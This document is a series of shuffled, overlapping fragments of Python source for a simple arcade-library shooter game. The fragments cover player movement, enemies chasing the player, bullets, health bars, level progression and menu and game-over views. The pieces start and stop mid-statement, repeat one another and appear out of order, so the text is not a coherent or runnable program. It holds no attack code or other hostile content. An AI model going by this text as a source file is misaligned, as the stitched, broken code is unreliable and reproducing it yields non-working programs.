"0 and self.window.level > self.updated_level: self.window.level += 1 self.good = True self.levels() self.amount_of_enemies",
"the destination location for the bullet dest_x = x dest_y = y #",
"and self.window.level > self.updated_level: self.window.level += 1 self.good = True self.levels() self.amount_of_enemies +=",
"arcade.color import BLACK, WHITE SPRITE_SCALING_PLAYER = .60 SPRITE_SCALING_ENEMY = 0.5 SPRITE_SCALING_ENEMY_2 = 0.15",
"arcade.play_sound(self.newLevel_sound) for enemy in self.enemy_list: player_hit = arcade.check_for_collision_with_list(enemy, self.player_list) if len(player_hit) > 0:",
"360 start_y = 210 arcade.draw_text(\"Click to Shoot\", start_x, start_y, arcade.color.RED, 15) start_x =",
"self.down_pressed = True elif key == arcade.key.LEFT: self.left_pressed = True elif key ==",
"image will be stored in this variable self.background = None def levels(self): while",
"self.down_pressed and not self.up_pressed: self.player_sprite.change_y = -MOVEMENT_SPEED if self.left_pressed and not self.right_pressed: self.player_sprite.change_x",
"> SCREEN_WIDTH - 1: self.right = SCREEN_WIDTH - 1 # Make sure he",
"key == arcade.key.UP: self.up_pressed = True elif key == arcade.key.DOWN: self.down_pressed = True",
"self.enemy_list: enemy.enemy_draw_health_number() enemy.enemy_draw_health_bar() def on_mouse_press(self, x, y, button, modifiers): # Called whenever the",
"2 #self.enemy_health += 1 self.speed += .20 arcade.play_sound(self.newLevel_sound) for enemy in self.enemy_list: player_hit",
"else: # Not dead arcade.play_sound(self.playerDeath_sound) # Loop through each bullet for bullet in",
"> self.width or bullet.top < 0 or bullet.right < 0 or bullet.left >",
"the destination. x_diff = dest_x - start_x y_diff = dest_y - start_y angle",
"and game logic \"\"\" self.player_sprite.change_x = 0 self.player_sprite.change_y = 0 if self.up_pressed and",
"current location start_x = self.player_sprite.center_x start_y = self.player_sprite.center_y bullet.center_x = start_x bullet.center_y =",
"+ HEALTH_NUMBER_OFFSET_Y, arcade.color.WHITE, 12) # arcade.draw_text(health_string, # start_x=self.center_x + HEALTH_NUMBER_OFFSET_X, # start_y=self.center_y +",
"how fast the bullet travels. bullet.change_x = math.cos(angle) * BULLET_SPEED bullet.change_y = math.sin(angle)",
"self.center_y -= min(SPRITE_SPEED, self.center_y - player_sprite.center_y) if self.center_x < player_sprite.center_x: self.center_x += min(SPRITE_SPEED,",
"game_view = MyGame() game_view.setup() self.window.show_view(game_view) arcade.run() class GameOverView(arcade.View): \"\"\" Class to manage the",
"enemy.enemy_draw_health_bar() def on_mouse_press(self, x, y, button, modifiers): # Called whenever the mouse button",
"a mouse press to advance to the 'game' view. \"\"\" game_view = MyGame()",
"the lists self.enemy_list.append(enemy) self.enemy_list.append(enemy2) if self.enemy_list == 0: self.level = self.updated_level + 1",
"up the player self.player_sprite = None self.enemy_health = 2 self.enemy_health2 = 5 self.enemy_health3",
"bullet.remove_from_sprite_lists() def main(): window = arcade.Window(SCREEN_WIDTH, SCREEN_HEIGHT, \"Shooter Game\") menu_view = MenuView() window.show_view(menu_view)",
"each bullet for bullet in self.bullet_list: # Check this bullet to see if",
"right sprite if not isinstance(enemy, ENEMY): raise TypeError(\"List contents must be all ints\")",
"keyboard to move around\", start_x, start_y, arcade.color.RED, 15) start_x = 310 start_y =",
"self.window.level = self.updated_level + 1 else: self.good = False def setup(self): # Set",
"not self.left_pressed: self.player_sprite.change_x = MOVEMENT_SPEED self.player_list.update() for enemy in self.enemy_list: enemy.follow_sprite(self.player_sprite) for enemy2",
"height=HEALTHBAR_HEIGHT + 10, color=arcade.color.RED) # Calculate width based on health start_x = 85",
"/ self.player_max_health) arcade.draw_rectangle_filled(start_x - 0.5 * (HEALTHBAR_WIDTH - health_width), start_y , width=health_width +",
"that will hold sprite lists self.player_list = None self.enemy_list = None self.bullet_list =",
"key, modifiers): \"\"\"Called when the user releases a key. \"\"\" if key ==",
"for enemy3 in self.enemy_list: enemy3.follow_sprite(self.player_sprite) # update all sprites self.bullet_list.update() if len(self.enemy_list) ==",
"player_max_health=10) self.player_sprite.center_x = 400 self.player_sprite.center_y = 300 self.player_list.append(self.player_sprite) self.levels() # Set the background",
"calculate how to get the bullet to the destination. x_diff = dest_x -",
"= 1 self.player_list = arcade.SpriteList() self.enemy_list = arcade.SpriteList() self.bullet_list = arcade.SpriteList() self.player_sprite =",
"20) arcade.draw_text(\"Click ESCAPE to return to Main Menu.\\n\", SCREEN_WIDTH/2, SCREEN_HEIGHT/4, arcade.color.WHITE, 25, anchor_x=\"center\")",
"bullet = arcade.Sprite(\":resources:images/space_shooter/meteorGrey_small1.png\", SPRITE_SCALING_BULLET) # Position the bullet at the player's current location",
"red background start_x = 120 start_y = 35 if self.player_cur_health < self.player_max_health: arcade.draw_rectangle_filled(start_x",
"elif key == arcade.key.LEFT: self.left_pressed = False elif key == arcade.key.RIGHT: self.right_pressed =",
"+50) * (self.player_cur_health / self.player_max_health) arcade.draw_rectangle_filled(start_x - 0.5 * (HEALTHBAR_WIDTH - health_width), start_y",
"= 2 self.enemy_health2 = 5 self.enemy_health3 = 10 self.good = True self.window.level =",
"random.randrange(120, SCREEN_HEIGHT) enemy2.center_x = random.randrange(SCREEN_WIDTH) enemy2.center_y = random.randrange(120, SCREEN_HEIGHT) # Add the enemy",
"self.speed += .20 arcade.play_sound(self.newLevel_sound) for enemy in self.enemy_list: player_hit = arcade.check_for_collision_with_list(enemy, self.player_list) if",
"enemy.remove_from_sprite_lists() for player in player_hit: # Make sure this is the right sprite",
"110 arcade.draw_text(\"Click to start\", start_x, start_y, arcade.color.WHITE, 20) arcade.draw_rectangle_outline(center_x=395, center_y=123, width=200, height=50, color=WHITE)",
"arcade.start_render() arcade.draw_lrwh_rectangle_textured(0, 0, SCREEN_WIDTH, SCREEN_HEIGHT, self.background) # Draw all the sprites self.enemy_list.draw() self.bullet_list.draw()",
"health_width), center_y=self.center_y - 10, width=health_width, height=HEALTHBAR_HEIGHT, color=arcade.color.GREEN) class MenuView(arcade.View): \"\"\" Class that manages",
"# Taking into account the angle, calculate our change_x # and change_y. Velocity",
"health_width = HEALTHBAR_WIDTH * (self.enemy_cur_health / self.enemy_max_health) arcade.draw_rectangle_filled(center_x=self.center_x - 0.5 * (HEALTHBAR_WIDTH -",
"start_y = 25 health_width = (HEALTHBAR_WIDTH +50) * (self.player_cur_health / self.player_max_health) arcade.draw_rectangle_filled(start_x -",
"1 arcade.play_sound(self.newLevel_sound) else: self.good = False elif self.window.level > 3 and self.window.level <",
"enemy in self.enemy_list: player_hit = arcade.check_for_collision_with_list(enemy, self.player_list) if len(player_hit) > 0: enemy.remove_from_sprite_lists() for",
"= arcade.check_for_collision_with_list(enemy, self.player_list) if len(player_hit) > 0: enemy.remove_from_sprite_lists() for player in player_hit: #",
"parent class initializer #super().__init__(SCREEN_WIDTH, SCREEN_HEIGHT, SCREEN_TITLE) super().__init__() # Variables that will hold sprite",
"the 'game' view. \"\"\" game_view = MyGame() game_view.setup() self.window.show_view(game_view) arcade.run() class GameOverView(arcade.View): \"\"\"",
"arcade.set_background_color(arcade.color.BLACK) def on_draw(self): \"\"\" Draw the menu \"\"\" arcade.start_render() start_x = 220 start_y",
"def on_key_press(self, key, modifiers): \"\"\"Called whenever a key is pressed. \"\"\" if key",
"key == arcade.key.UP: self.up_pressed = False elif key == arcade.key.DOWN: self.down_pressed = False",
"self.right_pressed = True def on_key_release(self, key, modifiers): \"\"\"Called when the user releases a",
"user hits escape, go back to the main menu view \"\"\" if key",
"self.center_x -= min(SPRITE_SPEED, self.center_x - player_sprite.center_x) def __init__(self, image, scale, enemy_max_health): super().__init__(image, scale)",
"extra attributes for health self.player_max_health = player_max_health self.player_cur_health = player_max_health def player_draw_health_number(self): #",
"= 290 start_y = 270 arcade.draw_text(f\"You died in level: {self.window.level}\", start_x, start_y, arcade.color.RED,",
"to the main guy if self.center_y < player_sprite.center_y: self.center_y += min(SPRITE_SPEED, player_sprite.center_y -",
"button is clicked arcade.play_sound(self.gun_sound) # Create a bullet bullet = arcade.Sprite(\":resources:images/space_shooter/meteorGrey_small1.png\", SPRITE_SCALING_BULLET) #",
"False else: for i in range(self.amount_of_enemies): # Create the enemy image enemy =",
"self.enemy_health2) enemy3 = ENEMY(\":resources:images/enemies/saw.png\", SPRITE_SCALING_ENEMY_3, self.enemy_health3) # Position the enemy enemy.center_x = random.randrange(SCREEN_WIDTH)",
"Draw the menu \"\"\" arcade.start_render() start_x = 220 start_y = 370 arcade.draw_text(\"Shooter Game\",",
"font_size=12, # color=arcade.color.WHITE) def player_draw_health_bar(self): # Draw the health bar # Draw the",
"SCREEN_TITLE) super().__init__() # Variables that will hold sprite lists self.player_list = None self.enemy_list",
"elif key == arcade.key.DOWN: self.down_pressed = True elif key == arcade.key.LEFT: self.left_pressed =",
"image enemy = ENEMY(\":resources:images/animated_characters/robot/robot_walk7.png\", SPRITE_SCALING_ENEMY, self.enemy_health) # Position the enemy enemy.center_x = random.randrange(SCREEN_WIDTH)",
"width=HEALTHBAR_WIDTH, height=3, color=arcade.color.RED) # Calculate width based on health health_width = HEALTHBAR_WIDTH *",
"{self.window.level}\" arcade.draw_text(output, 12, 45, arcade.color.WHITE, 15) for player in self.player_list: player.player_draw_health_number() player.player_draw_health_bar() for",
"the player self.player_sprite = None self.enemy_health = 2 self.enemy_health2 = 5 self.enemy_health3 =",
"button, modifiers): # Called whenever the mouse button is clicked arcade.play_sound(self.gun_sound) # Create",
"MOVEMENT_SPEED elif self.down_pressed and not self.up_pressed: self.player_sprite.change_y = -MOVEMENT_SPEED if self.left_pressed and not",
"is clicked arcade.play_sound(self.gun_sound) # Create a bullet bullet = arcade.Sprite(\":resources:images/space_shooter/meteorGrey_small1.png\", SPRITE_SCALING_BULLET) # Position",
"self.background = None def levels(self): while self.good: if self.window.level >= 0 and self.window.level",
"self.player_sprite.change_y = MOVEMENT_SPEED elif self.down_pressed and not self.up_pressed: self.player_sprite.change_y = -MOVEMENT_SPEED if self.left_pressed",
"_y, _button, _modifiers): \"\"\" Use a mouse press to advance to the 'game'",
"enemy = ENEMY(\":resources:images/animated_characters/robot/robot_walk7.png\", SPRITE_SCALING_ENEMY, self.enemy_health) # Position the enemy enemy.center_x = random.randrange(SCREEN_WIDTH) enemy.center_y",
"back to the main menu view \"\"\" if key == arcade.key.ESCAPE: menu_view =",
"arcade.check_for_collision_with_list(enemy, self.player_list) if len(player_hit) > 0: enemy.remove_from_sprite_lists() for player in player_hit: # Make",
"Create a bullet bullet = arcade.Sprite(\":resources:images/space_shooter/meteorGrey_small1.png\", SPRITE_SCALING_BULLET) # Position the bullet at the",
"health_string = f\"{self.player_cur_health}/{self.player_max_health}\" start_x = 25 start_y = 40 arcade.draw_text(health_string, start_x + HEALTH_NUMBER_OFFSET_X,",
"this bullet to see if it hit a enemy hit_list = arcade.check_for_collision_with_list(bullet, self.enemy_list)",
"self.right_pressed = False def on_draw(self): # render the screen befroe start drawing arcade.start_render()",
"the screen if self.bottom < 0: self.bottom = 0 elif self.top > SCREEN_HEIGHT",
"> 0: bullet.remove_from_sprite_lists() # For every enemy we hit, process for enemy in",
"follow_sprite(self, player_sprite): # This tells the enemies to go to the main guy",
"SPRITE_SCALING_PLAYER, player_max_health=10) self.player_sprite.center_x = 400 self.player_sprite.center_y = 300 self.player_list.append(self.player_sprite) self.levels() # Set the",
"self.enemy_list.append(enemy2) if self.enemy_list == 0: self.level = self.updated_level + 1 else: self.good =",
"Do math to calculate how to get the bullet to the destination. x_diff",
"player_sprite.center_y: self.center_y -= min(SPRITE_SPEED, self.center_y - player_sprite.center_y) if self.center_x < player_sprite.center_x: self.center_x +=",
"mouse press to advance to the 'game' view. \"\"\" game_view = MyGame() game_view.setup()",
"# and change_y. Velocity is how fast the bullet travels. bullet.change_x = math.cos(angle)",
"# This tells the enemies to go to the main guy if self.center_y",
"width=HEALTHBAR_WIDTH + 60, height=HEALTHBAR_HEIGHT + 10, color=arcade.color.RED) # Calculate width based on health",
"player.player_cur_health -= 1 # Check health if player.player_cur_health <= 0: arcade.play_sound(self.gameOver_sound) game_over =",
"self.center_x < player_sprite.center_x: self.center_x += min(SPRITE_SPEED, player_sprite.center_x - self.center_x) elif self.center_x > player_sprite.center_x:",
"= -1 self.amount_of_enemies = 5 self.speed = SPRITE_SPEED # Game Sounds self.newLevel_sound =",
"on_mouse_press(self, x, y, button, modifiers): # Called whenever the mouse button is clicked",
"the red background if self.enemy_cur_health < self.enemy_max_health: arcade.draw_rectangle_filled(center_x=self.center_x, center_y=self.center_y + HEALTHBAR_OFFSET_Y, width=HEALTHBAR_WIDTH, height=3,",
"player_sprite.center_x: self.center_x -= min(SPRITE_SPEED, self.center_x - player_sprite.center_x) def __init__(self, image, scale, enemy_max_health): super().__init__(image,",
"# If the bullet flies off-screen, remove it. if bullet.bottom > self.width or",
"#super().__init__(SCREEN_WIDTH, SCREEN_HEIGHT, SCREEN_TITLE) super().__init__() # Variables that will hold sprite lists self.player_list =",
"background start_x = 120 start_y = 35 if self.player_cur_health < self.player_max_health: arcade.draw_rectangle_filled(start_x +",
"self.player_list = None self.enemy_list = None self.bullet_list = None # Set up the",
"# Add the enemy to the lists self.enemy_list.append(enemy) if self.enemy_list == 0: self.window.level",
"20) arcade.draw_rectangle_outline(center_x=395, center_y=123, width=200, height=50, color=WHITE) def on_mouse_press(self, _x, _y, _button, _modifiers): \"\"\"",
"<filename>shooting_game/assets/Shooter-Game.py<gh_stars>0 import random import arcade import math import os from arcade.color import BLACK,",
"# Draw the red background start_x = 120 start_y = 35 if self.player_cur_health",
"self.player_list.draw() output = f\"Level: {self.window.level}\" arcade.draw_text(output, 12, 45, arcade.color.WHITE, 15) for player in",
"player_sprite): # This tells the enemies to go to the main guy if",
"a bullet bullet = arcade.Sprite(\":resources:images/space_shooter/meteorGrey_small1.png\", SPRITE_SCALING_BULLET) # Position the bullet at the player's",
"# Draw how many health the enemies have health_string = f\"{self.enemy_cur_health}/{self.enemy_max_health}\" arcade.draw_text(health_string, start_x=self.center_x",
"Call the parent class initializer #super().__init__(SCREEN_WIDTH, SCREEN_HEIGHT, SCREEN_TITLE) super().__init__() # Variables that will",
"5 HEALTHBAR_OFFSET_Y = -10 HEALTH_NUMBER_OFFSET_X = -10 HEALTH_NUMBER_OFFSET_Y = -25 MOVEMENT_SPEED = 5",
"to get the bullet to the destination. x_diff = dest_x - start_x y_diff",
"Sounds self.newLevel_sound = arcade.load_sound(\"shooting_game/assets/sounds/newLevel.wav\") self.gun_sound = arcade.load_sound(\"shooting_game/assets/sounds/shoot.wav\") self.hit_sound = arcade.load_sound(\"shooting_game/assets/sounds/shoot.wav\") self.death_sound = arcade.load_sound(\"shooting_game/assets/sounds/deathenemy.wav\")",
"player.player_draw_health_number() player.player_draw_health_bar() for enemy in self.enemy_list: enemy.enemy_draw_health_number() enemy.enemy_draw_health_bar() def on_mouse_press(self, x, y, button,",
"= PLAYER(\":resources:images/animated_characters/male_adventurer/maleAdventurer_walk1.png\", SPRITE_SCALING_PLAYER, player_max_health=10) start_x = 208 start_y = 270 arcade.draw_text(\"Use the arrow",
"for player in self.player_list: player.player_draw_health_number() player.player_draw_health_bar() for enemy in self.enemy_list: enemy.enemy_draw_health_number() enemy.enemy_draw_health_bar() def",
"enemy_max_health): super().__init__(image, scale) # Add extra attributes for health self.enemy_max_health = enemy_max_health self.enemy_cur_health",
"enemy in self.enemy_list: enemy.follow_sprite(self.player_sprite) for enemy2 in self.enemy_list: enemy2.follow_sprite(self.player_sprite) for enemy3 in self.enemy_list:",
"Add the enemy to the lists self.enemy_list.append(enemy) self.enemy_list.append(enemy2) self.enemy_list.append(enemy3) if self.enemy_list == 0:",
"self.player_max_health) arcade.draw_rectangle_filled(start_x - 0.5 * (HEALTHBAR_WIDTH - health_width), start_y , width=health_width + 10,",
"import arcade import math import os from arcade.color import BLACK, WHITE SPRITE_SCALING_PLAYER =",
"raise TypeError(\"List contents must be all ints\") # Remove one health point player.player_cur_health",
"if self.enemy_list == 0: self.window.level = self.updated_level + 1 else: self.good = False",
"start_y = 40 arcade.draw_text(health_string, start_x + HEALTH_NUMBER_OFFSET_X, start_y + HEALTH_NUMBER_OFFSET_Y, arcade.color.WHITE, 12) #",
"every enemy we hit, process for enemy in hit_list: # Make sure this",
"< 0: self.left = 0 elif self.right > SCREEN_WIDTH - 1: self.right =",
"player_sprite.center_x: self.center_x += min(SPRITE_SPEED, player_sprite.center_x - self.center_x) elif self.center_x > player_sprite.center_x: self.center_x -=",
"HEALTHBAR_HEIGHT = 5 HEALTHBAR_OFFSET_Y = -10 HEALTH_NUMBER_OFFSET_X = -10 HEALTH_NUMBER_OFFSET_Y = -25 MOVEMENT_SPEED",
"SPRITE_SCALING_ENEMY_3 = 0.3 SPRITE_SCALING_BULLET = 0.7 ENEMY_COUNT = 15 SCREEN_WIDTH = 800 SCREEN_HEIGHT",
"health_width), start_y , width=health_width + 10, height=HEALTHBAR_HEIGHT + 10, color=arcade.color.GREEN) def update(self): \"\"\"",
"the game over view \"\"\" def on_show(self): \"\"\" Called when switching to this",
"math.cos(angle) * BULLET_SPEED bullet.change_y = math.sin(angle) * BULLET_SPEED # Add the bullet to",
"arcade.draw_lrwh_rectangle_textured(0, 0, SCREEN_WIDTH, SCREEN_HEIGHT, self.background) # Draw all the sprites self.enemy_list.draw() self.bullet_list.draw() self.player_list.draw()",
"image, scale, player_max_health): super().__init__(image, scale) # Add extra attributes for health self.player_max_health =",
"-= min(SPRITE_SPEED, self.center_x - player_sprite.center_x) def __init__(self, image, scale, enemy_max_health): super().__init__(image, scale) #",
"None self.enemy_health = 2 self.enemy_health2 = 5 self.enemy_health3 = 10 self.good = True",
"Rotate the coin. # The arcade.Sprite class has an \"angle\" attribute that controls",
"self.updated_level + 1 else: self.good = False def setup(self): # Set up the",
"- health_width), center_y=self.center_y - 10, width=health_width, height=HEALTHBAR_HEIGHT, color=arcade.color.GREEN) class MenuView(arcade.View): \"\"\" Class that",
"self.updated_level: self.window.level += 1 self.good = True self.levels() self.amount_of_enemies += 2 #self.enemy_health +=",
"to aim\", start_x, start_y, arcade.color.RED, 15) start_x = 360 start_y = 210 arcade.draw_text(\"Click",
"arcade.color.RED, 100, anchor_x=\"center\") start_x = 290 start_y = 270 arcade.draw_text(f\"You died in level:",
"SCREEN_HEIGHT - 1: self.top = SCREEN_HEIGHT - 1 class ENEMY(arcade.Sprite): def update(self): #",
"self.player_list) if len(player_hit) > 0: enemy.remove_from_sprite_lists() for player in player_hit: # Make sure",
"12) # arcade.draw_text(health_string, # start_x=self.center_x + HEALTH_NUMBER_OFFSET_X, # start_y=self.center_y + HEALTH_NUMBER_OFFSET_Y, # font_size=12,",
"around\", start_x, start_y, arcade.color.RED, 15) start_x = 310 start_y = 240 arcade.draw_text(\"Use your",
"self.top > SCREEN_HEIGHT - 1: self.top = SCREEN_HEIGHT - 1 class ENEMY(arcade.Sprite): def",
"{self.window.level}\", start_x, start_y, arcade.color.RED, 20) arcade.draw_text(\"Click ESCAPE to return to Main Menu.\\n\", SCREEN_WIDTH/2,",
"= MenuView() window.show_view(menu_view) arcade.run() window.level = 0 # game = MyGame() # game.setup()",
"# Create the enemy image enemy = ENEMY(\":resources:images/animated_characters/robot/robot_walk7.png\", SPRITE_SCALING_ENEMY, self.enemy_health) enemy2 = ENEMY(\":resources:images/animated_characters/robot/robot_fall.png\",",
"bullet flies off-screen, remove it. if bullet.bottom > self.width or bullet.top < 0",
"Variables that will hold sprite lists self.player_list = None self.enemy_list = None self.bullet_list",
"+= self.change_y # Check for out-of-bounds if self.left < 0: self.left = 0",
"Create the enemy image enemy = ENEMY(\":resources:images/animated_characters/robot/robot_walk7.png\", SPRITE_SCALING_ENEMY, self.enemy_health) # Position the enemy",
"self.change_x self.center_y += self.change_y # Check for out-of-bounds if self.left < 0: self.left",
"color=WHITE) def on_mouse_press(self, _x, _y, _button, _modifiers): \"\"\" Use a mouse press to",
"the enemies have health_string = f\"{self.enemy_cur_health}/{self.enemy_max_health}\" arcade.draw_text(health_string, start_x=self.center_x + HEALTH_NUMBER_OFFSET_X, start_y=self.center_y + HEALTH_NUMBER_OFFSET_Y,",
"# Draw the health bar # Draw the red background start_x = 120",
"+ 60, height=HEALTHBAR_HEIGHT + 10, color=arcade.color.RED) # Calculate width based on health start_x",
"enemies to go to the main guy if self.center_y < player_sprite.center_y: self.center_y +=",
"= random.randrange(SCREEN_WIDTH) enemy2.center_y = random.randrange(120, SCREEN_HEIGHT) # Add the enemy to the lists",
"= 25 HEALTHBAR_HEIGHT = 5 HEALTHBAR_OFFSET_Y = -10 HEALTH_NUMBER_OFFSET_X = -10 HEALTH_NUMBER_OFFSET_Y =",
"the mouse button is clicked arcade.play_sound(self.gun_sound) # Create a bullet bullet = arcade.Sprite(\":resources:images/space_shooter/meteorGrey_small1.png\",",
"0.7 ENEMY_COUNT = 15 SCREEN_WIDTH = 800 SCREEN_HEIGHT = 600 SCREEN_TITLE = \"Shooter",
"self.width or bullet.top < 0 or bullet.right < 0 or bullet.left > self.width:",
"the enemies to go to the main guy if self.center_y < player_sprite.center_y: self.center_y",
"destination. x_diff = dest_x - start_x y_diff = dest_y - start_y angle =",
"if bullet.bottom > self.width or bullet.top < 0 or bullet.right < 0 or",
"arcade.draw_text(output, 12, 45, arcade.color.WHITE, 15) for player in self.player_list: player.player_draw_health_number() player.player_draw_health_bar() for enemy",
"sure this is the right sprite if not isinstance(player, PLAYER): raise TypeError(\"List contents",
"False elif key == arcade.key.RIGHT: self.right_pressed = False def on_draw(self): # render the",
"HEALTHBAR_WIDTH * (self.enemy_cur_health / self.enemy_max_health) arcade.draw_rectangle_filled(center_x=self.center_x - 0.5 * (HEALTHBAR_WIDTH - health_width), center_y=self.center_y",
"def enemy_draw_health_number(self): # Draw how many health the enemies have health_string = f\"{self.enemy_cur_health}/{self.enemy_max_health}\"",
"= \"Shooter Game\" SPRITE_SPEED = 0.20 BULLET_SPEED = 5 HEALTHBAR_WIDTH = 25 HEALTHBAR_HEIGHT",
"SCREEN_HEIGHT) enemy3.center_x = random.randrange(SCREEN_WIDTH) enemy3.center_y = random.randrange(120, SCREEN_HEIGHT) # Add the enemy to",
"for bullet in self.bullet_list: # Check this bullet to see if it hit",
"health the enemies have health_string = f\"{self.enemy_cur_health}/{self.enemy_max_health}\" arcade.draw_text(health_string, start_x=self.center_x + HEALTH_NUMBER_OFFSET_X, start_y=self.center_y +",
"self.hit_sound = arcade.load_sound(\"shooting_game/assets/sounds/shoot.wav\") self.death_sound = arcade.load_sound(\"shooting_game/assets/sounds/deathenemy.wav\") self.playerDeath_sound = arcade.load_sound(\"shooting_game/assets/sounds/death.wav\") self.gameOver_sound = arcade.load_sound(\"shooting_game/assets/sounds/gameOver.wav\") self.left_pressed",
"in this variable self.background = None def levels(self): while self.good: if self.window.level >=",
"menu \"\"\" arcade.start_render() start_x = 220 start_y = 370 arcade.draw_text(\"Shooter Game\", start_x, start_y,",
"enemy2 in self.enemy_list: enemy2.follow_sprite(self.player_sprite) for enemy3 in self.enemy_list: enemy3.follow_sprite(self.player_sprite) # update all sprites",
"0: # enemy dead enemy.remove_from_sprite_lists() arcade.play_sound(self.death_sound) else: # Not dead arcade.play_sound(self.hit_sound) # If",
"arcade.run() class GameOverView(arcade.View): \"\"\" Class to manage the game over view \"\"\" def",
"math import os from arcade.color import BLACK, WHITE SPRITE_SCALING_PLAYER = .60 SPRITE_SCALING_ENEMY =",
"is the right sprite if not isinstance(enemy, ENEMY): raise TypeError(\"List contents must be",
"the lists self.enemy_list.append(enemy) self.enemy_list.append(enemy2) self.enemy_list.append(enemy3) if self.enemy_list == 0: self.window.level = self.updated_level +",
"self.player_cur_health < self.player_max_health: arcade.draw_rectangle_filled(start_x + HEALTH_NUMBER_OFFSET_X, start_y + HEALTHBAR_OFFSET_Y, width=HEALTHBAR_WIDTH + 60, height=HEALTHBAR_HEIGHT",
"Draw the game over view \"\"\" arcade.start_render() arcade.draw_text(\"Game Over!\\n\", SCREEN_WIDTH/2, SCREEN_HEIGHT/2.5, arcade.color.RED, 100,",
"\"Shooter Game\" SPRITE_SPEED = 0.20 BULLET_SPEED = 5 HEALTHBAR_WIDTH = 25 HEALTHBAR_HEIGHT =",
"to manage the game over view \"\"\" def on_show(self): \"\"\" Called when switching",
"- 1 class ENEMY(arcade.Sprite): def update(self): # Rotate the coin. # The arcade.Sprite",
"== arcade.key.UP: self.up_pressed = True elif key == arcade.key.DOWN: self.down_pressed = True elif",
"= enemy_max_health def enemy_draw_health_number(self): # Draw how many health the enemies have health_string",
"center_y=self.center_y + HEALTHBAR_OFFSET_Y, width=HEALTHBAR_WIDTH, height=3, color=arcade.color.RED) # Calculate width based on health health_width",
"= 40 arcade.draw_text(health_string, start_x + HEALTH_NUMBER_OFFSET_X, start_y + HEALTH_NUMBER_OFFSET_Y, arcade.color.WHITE, 12) # arcade.draw_text(health_string,",
"# enemy dead player.remove_from_sprite_lists() else: # Not dead arcade.play_sound(self.playerDeath_sound) # Loop through each",
"SPRITE_SPEED = 0.20 BULLET_SPEED = 5 HEALTHBAR_WIDTH = 25 HEALTHBAR_HEIGHT = 5 HEALTHBAR_OFFSET_Y",
"25 HEALTHBAR_HEIGHT = 5 HEALTHBAR_OFFSET_Y = -10 HEALTH_NUMBER_OFFSET_X = -10 HEALTH_NUMBER_OFFSET_Y = -25",
"enemy dead enemy.remove_from_sprite_lists() arcade.play_sound(self.death_sound) else: # Not dead arcade.play_sound(self.hit_sound) # If the bullet",
"self.left = 0 elif self.right > SCREEN_WIDTH - 1: self.right = SCREEN_WIDTH -",
"arcade.draw_text(health_string, # start_x=self.center_x + HEALTH_NUMBER_OFFSET_X, # start_y=self.center_y + HEALTH_NUMBER_OFFSET_Y, # font_size=12, # color=arcade.color.WHITE)",
"off-screen, remove it. if bullet.bottom > self.width or bullet.top < 0 or bullet.right",
"mouse button is clicked arcade.play_sound(self.gun_sound) # Create a bullet bullet = arcade.Sprite(\":resources:images/space_shooter/meteorGrey_small1.png\", SPRITE_SCALING_BULLET)",
"0 if self.up_pressed and not self.down_pressed: self.player_sprite.change_y = MOVEMENT_SPEED elif self.down_pressed and not",
"TypeError(\"List contents must be all ints\") # Remove one health point player.player_cur_health -=",
"the right sprite if not isinstance(enemy, ENEMY): raise TypeError(\"List contents must be all",
"Add the enemy to the lists self.enemy_list.append(enemy) self.enemy_list.append(enemy2) if self.enemy_list == 0: self.level",
"ints\") # Remove one health point player.player_cur_health -= 1 # Check health if",
"# Not dead arcade.play_sound(self.hit_sound) # If the bullet flies off-screen, remove it. if",
"health the enemies have health_string = f\"{self.player_cur_health}/{self.player_max_health}\" start_x = 25 start_y = 40",
"self.player_sprite.change_x = -MOVEMENT_SPEED elif self.right_pressed and not self.left_pressed: self.player_sprite.change_x = MOVEMENT_SPEED self.player_list.update() for",
"random.randrange(SCREEN_WIDTH) enemy.center_y = random.randrange(120, SCREEN_HEIGHT) enemy2.center_x = random.randrange(SCREEN_WIDTH) enemy2.center_y = random.randrange(120, SCREEN_HEIGHT) #",
"point enemy.enemy_cur_health -= 1 # Check health if enemy.enemy_cur_health <= 0: # enemy",
"while self.good: if self.window.level >= 0 and self.window.level <= 3: for i in",
"len(player_hit) > 0: enemy.remove_from_sprite_lists() for player in player_hit: # Make sure this is",
"health if player.player_cur_health <= 0: arcade.play_sound(self.gameOver_sound) game_over = GameOverView() self.window.show_view(game_over) arcade.run() # enemy",
"- self.center_x) elif self.center_x > player_sprite.center_x: self.center_x -= min(SPRITE_SPEED, self.center_x - player_sprite.center_x) def",
"# color=arcade.color.WHITE) def player_draw_health_bar(self): # Draw the health bar # Draw the red",
"has an \"angle\" attribute that controls # the sprite rotation. Change this, and",
"start_y, arcade.color.WHITE, 50) self.player_sprite = PLAYER(\":resources:images/animated_characters/male_adventurer/maleAdventurer_walk1.png\", SPRITE_SCALING_PLAYER, player_max_health=10) start_x = 208 start_y =",
"one health point enemy.enemy_cur_health -= 1 # Check health if enemy.enemy_cur_health <= 0:",
"key. \"\"\" if key == arcade.key.UP: self.up_pressed = False elif key == arcade.key.DOWN:",
"= math.atan2(y_diff, x_diff) # Taking into account the angle, calculate our change_x #",
"SCREEN_HEIGHT, SCREEN_TITLE) super().__init__() # Variables that will hold sprite lists self.player_list = None",
"0 elif self.right > SCREEN_WIDTH - 1: self.right = SCREEN_WIDTH - 1 #",
"for enemy2 in self.enemy_list: enemy2.follow_sprite(self.player_sprite) for enemy3 in self.enemy_list: enemy3.follow_sprite(self.player_sprite) # update all",
"HEALTH_NUMBER_OFFSET_X = -10 HEALTH_NUMBER_OFFSET_Y = -25 MOVEMENT_SPEED = 5 class PLAYER(arcade.Sprite): def __init__(self,",
"= True self.window.level = 1 self.updated_level = -1 self.amount_of_enemies = 5 self.speed =",
"over view \"\"\" def on_show(self): \"\"\" Called when switching to this view\"\"\" arcade.set_background_color(arcade.color.BLACK)",
"f\"{self.enemy_cur_health}/{self.enemy_max_health}\" arcade.draw_text(health_string, start_x=self.center_x + HEALTH_NUMBER_OFFSET_X, start_y=self.center_y + HEALTH_NUMBER_OFFSET_Y, font_size=12, color=arcade.color.WHITE) def enemy_draw_health_bar(self): #",
"self.left_pressed = True elif key == arcade.key.RIGHT: self.right_pressed = True def on_key_release(self, key,",
"arrow keys on your keyboard to move around\", start_x, start_y, arcade.color.RED, 15) start_x",
"else: self.good = False else: for i in range(self.amount_of_enemies): # Create the enemy",
"contents must be all ints\") # Remove one health point player.player_cur_health -= 1",
"Check health if enemy.enemy_cur_health <= 0: # enemy dead enemy.remove_from_sprite_lists() arcade.play_sound(self.death_sound) else: #",
"player self.player_sprite = None self.enemy_health = 2 self.enemy_health2 = 5 self.enemy_health3 = 10",
